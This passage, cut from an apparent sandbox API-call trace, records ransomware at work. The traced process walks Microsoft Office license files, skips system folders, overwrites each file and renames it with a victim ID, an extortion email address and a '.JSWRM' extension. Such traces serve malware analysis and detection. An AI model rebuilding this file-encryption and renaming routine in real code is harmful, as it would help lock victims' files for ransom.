lpFileSize=0x345ebf8*=5960) returned 1 [0109.781] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1740) returned 0x205850 [0109.782] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1740, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1740, lpOverlapped=0x0) returned 1 [0109.783] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.783] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1740, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1740, lpOverlapped=0x0) returned 1 [0109.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0109.784] CloseHandle (hObject=0x45c) returned 1 [0109.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0109.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0109.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0109.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0109.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0109.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0109.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.784] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessentryr_prepidbypass-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessentryr_prepidbypass-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0109.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0109.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f1b0 | out: hHeap=0x1e0000) returned 1 [0109.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.785] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaf9f44b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeaf9f44b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb1b559b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d09, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", cAlternateFileName="SKYPEF~4.XRM")) returned 1 [0109.785] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.785] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.785] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.785] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.785] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0109.785] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.785] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.785] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.785] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.785] lstrcmpiW (lpString1="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0109.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0109.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", cchWideChar=49, lpMultiByteStr=0x20dba8, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 49 [0109.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0109.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0109.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0109.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", cchWideChar=49, lpMultiByteStr=0x20dde8, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 49 [0109.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0109.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dd70 [0109.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0109.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0109.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessentryr_prepidbypass-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.786] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11529) returned 1 [0109.786] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d00) returned 0x24c1d0 [0109.786] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d00, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d00, lpOverlapped=0x0) returned 1 [0109.930] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.930] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d00, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d00, lpOverlapped=0x0) returned 1 [0109.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.931] CloseHandle (hObject=0x45c) returned 1 [0109.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0109.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0109.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0109.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0109.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0109.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0109.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.931] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessentryr_prepidbypass-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessEntryR_PrepidBypass-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessentryr_prepidbypass-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0109.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0109.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0109.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0109.933] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaf52f93, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeaf52f93, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb18f2e2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x513e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessR_Grace-ppd.xrm-ms", cAlternateFileName="SKYPEF~3.XRM")) returned 1 [0109.933] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0109.933] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0109.933] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0109.933] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0109.933] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ppd.xrm-ms", lpString2="recovery") returned 1 [0109.933] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.933] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.933] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.933] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.933] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0109.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0109.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0109.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0109.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0109.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0109.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Grace-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0109.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0109.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0109.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0109.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0109.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.935] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20798) returned 1 [0109.935] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5130) returned 0x24c1d0 [0109.935] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5130, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5130, lpOverlapped=0x0) returned 1 [0109.938] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.938] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5130, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5130, lpOverlapped=0x0) returned 1 [0109.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.938] CloseHandle (hObject=0x45c) returned 1 [0109.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0109.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0109.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0109.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0109.938] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0109.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0109.938] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.938] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0109.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0109.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0109.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.939] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.939] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaf2cd2e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeaf2cd2e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb142e44, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d7c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessR_Grace-ul-oob.xrm-ms", cAlternateFileName="SKYPEF~2.XRM")) returned 1 [0109.940] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.940] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.940] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.940] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.940] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0109.940] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.940] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.940] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.940] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.940] lstrcmpiW (lpString1="SkypeforBusinessR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0109.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0109.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0109.940] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0109.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0109.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0109.940] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessR_Grace-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 